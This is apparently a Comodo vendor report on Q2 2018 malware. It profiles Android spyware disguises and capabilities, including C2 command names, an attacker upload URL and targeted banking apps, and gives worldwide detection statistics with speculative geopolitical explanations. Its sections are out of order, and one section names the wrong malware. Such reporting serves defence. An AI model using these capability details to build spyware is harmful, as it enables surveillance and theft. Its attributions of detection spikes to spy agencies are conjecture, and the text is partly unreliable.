Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1 Naver Defender

Version-2 Netease Defender

Version-3 PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contacts, ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.

Version-1 Dardesh Google Play Services Instant Apps

Version-2 Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim's device.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos audios and videos

Records screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it brings a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3 FaceBook Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: comwooribankpibsmart, comkbstarkbbank, comibkneobanking, comscdanbscbankapp, comshinhansbanking, comhanabankebkchannelandroidhananbank, nhsmart, comepostpsfsdsi, comkftckjbsmb, comsmgspbs

Extract contacts details

Set Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1 Adobe Flash Player

Version2 Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email ID

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version_2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises shown above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is this possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it on the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. A thief robbing a thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects exe and scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on that day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategies, policies, and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


5 MALWARE IN Q2 2018: THE BIG PICTURE 39
5.1 STRATEGIC THREAT: COMPUTER WORMS 40
5.1.1 Generic Worms 41
5.1.2 Net Worms 42
5.1.3 Email Worms 43
5.1.4 p2p Worms 44
5.1.5 IM Worms 45
5.2 HIGH THREAT MALWARE 46
5.2.1 Backdoors 47
5.2.2 Viruses 48
5.2.3 Trojans 49
5.2.4 Exploits 50
5.3 MEDIUM THREAT MALWARE 51
5.3.1 Constructor 52
5.3.2 Packers 53
5.3.3 Email Flooder 54
5.3.4 Virtual Tools 55
5.3.5 Jokes 56
5.4 LOW THREAT MALWARE: APPLICATIONS 57
5.4.1 Applications 58
5.4.2 Unwanted Applications 59
5.4.3 Unsafe Applications 60
6 VERTICAL ANALYSIS 61
7 GEOPOLITICAL INTELLIGENCE 63
7.1 USA 63
7.2 CHINA 64
7.3 SOUTH KOREA 65
7.4 NORTH KOREA 66
7.5 ARMENIA 67
7.6 BELARUS 68
7.7 IRAQ 69
7.8 UKRAINE 70
7.9 CROATIA 71
7.10 FINLAND, RUSSIA, USA 72
8 CONCLUSIONS 73


1 Executive summary

1.1 Overview

• In Q2, Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey, and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by trojans.

1.2 New Trends

1.2.1 Trojans jumped to the top of the malware list

The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of malware. Attackers use trojans to deliver other malware, and the trojan surge is accompanied by a significant increase in other malware infections. As such, users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity.

1.2.2 Cryptominers evolved into multifunctional malware

Cryptomining decreased in quantity but grew in harmful capabilities. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antiviruses and root themselves deeply in users' systems.

1.2.3 Android malware skyrocketed in variety

In Q2, the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device represents a treasure trove of data. Spyware takes the lead among Android malware types. Like real-world spies, Android spyware constantly changes its guises and methods of avoiding detection, and its harmful potential goes up with every new version.

1.2.4 Geopolitical intelligence

